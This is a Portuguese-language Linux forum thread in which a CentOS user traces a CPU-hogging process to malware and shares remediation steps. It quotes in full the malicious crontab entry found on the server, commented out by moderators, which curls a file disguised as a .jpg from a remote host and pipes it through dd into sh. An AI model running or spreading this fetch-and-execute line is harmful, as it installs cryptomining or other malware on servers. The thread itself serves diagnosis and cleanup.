Duvida de sobre um serviço identificado na tela com o comando TOP

rodrigomartins80
(usa CentOS)

Enviado em 25/04/2017 - 07:48h

Ola , pessoal sou iniciante no Linux e temos hoje na empresa que trabalho o CENT OS 6.4 e tenho uma aplicação java rodando nele, desde quinta feira identifiquei, que tem um serviço chamado 17280 (coluna COMMAND), Porem não sei se e um vírus ou se e algum serviço que esta rodando hoje ele ja veio com um nome diferente veio como 17281. sempre que ele sobe o processamento do sistema fica no talo, a cpu esta acima de 100% ai quando eu paro ele o sistema volta a funcionar.

rodrigomartins80
(usa CentOS)

Enviado em 25/04/2017 - 10:46h

Pessoal , identifiquei que o serviço estranho que estava aparecendo e ocupando o processamento do servidor e um virus escondido em uma imagem , para identificar o mesmo digite na linha de comando o seguinte:

$ crontab -l
no meu caso tive o seguinte retorno
EDITADO PELA MODERAÇÃO
# Comentário, para evitar execução:
# */60 * * * * curl http://WEBHOST.por.ai.lol/iBabem.jpg -kL|dd skip=42 bs=0 |sh
* EDITADO PELA MODERAÇÃO


esta imagem tem uma linha de comando acesse a mesma e esclua tudo que tiver la dentro, desta forma quando o virus voltar identificara que o arquivo ainda esta no lugar e nao fara nada, isto e so uma sobrevida para que as suas aplicações funcionem

usei o comando
$ crontab - e
para editar o mesmo

outa ação que realizamos aqui foi a de identificar as saídas estranhas e identificamos a saída justamente para este link em 3 ips diferentes, bloqueamos o mesmo e restringimos o nosso servidor para acesso a internet para apenas algumas paginas, alem de trocar as portas de acesso a o nosso sistema


Causa provável
A nossa aplicação estava utilizando a porta padrão de acesso a WEB 8080 , alteramos a mesma pois esse e o critério que o vírus esta batendo para invasão.

Solução
Deletamos o que tinha dentro do arquivo
trocamos as portas de acesso externo da aplicação
estamos preparando uma nova maquina para instalação nova do sistema